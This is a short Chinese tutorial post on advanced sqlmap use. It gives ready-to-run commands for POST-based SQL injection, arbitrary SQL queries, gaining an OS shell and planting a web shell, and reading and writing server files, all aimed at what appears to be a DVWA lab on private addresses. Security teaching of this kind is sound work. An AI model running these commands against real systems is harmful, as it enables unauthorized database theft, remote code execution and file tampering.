【愚公系列】2022年03月 Web渗透测试之sqlmap的高级用法
【摘要】 一:post注入1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.注入方式1.sqlmap.py -r c:\1.txt-p username -D mysql --tables2.sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms3.sqlmap -u http://xx...
一:post注入
1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下
2.注入方式
1.sqlmap.py -r c:\1.txt-p username -D mysql --tables
2.sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms
3.sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"
二:辅助手工注入
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "select user(),version(),database()"
其他sql语法类似
三:交互式写shell
//判断是否为dba用户
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --is-dba
//写入shell
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --os-shell
写入shell后会给出路径:http://10.1.1.136/vulnerabilities/exec/tmpujhum.php
根据路径访问上传木马文件。
四:文件读写
读取文件:
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" -——cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-read=/opt/lampp/htdocs/php.ini
写入文件:
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txt
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)